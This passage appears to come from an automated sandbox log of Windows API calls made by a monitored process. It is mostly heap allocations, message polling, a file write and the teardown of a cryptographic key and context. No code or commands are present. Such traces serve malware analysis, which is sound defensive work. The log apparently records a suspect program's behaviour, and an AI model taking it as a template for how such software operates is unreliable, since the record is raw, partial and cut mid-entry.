Size=0x8) returned 0x2e54e88 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.961] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.961] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.052] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x96d0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x96d0, lpOverlapped=0x0) returned 1 [0211.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0211.057] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0211.057] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0211.057] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.057] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0211.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50848, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.058] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0211.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.058] CryptDestroyKey (hKey=0xa87350) returned 1 [0211.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.060] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.061] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0211.061] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0211.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0211.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0211.061] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0211.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0211.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0211.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.062] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.062] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.062] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0211.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.063] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.063] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.063] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.064] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.064] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.064] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.064] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.064] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.068] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 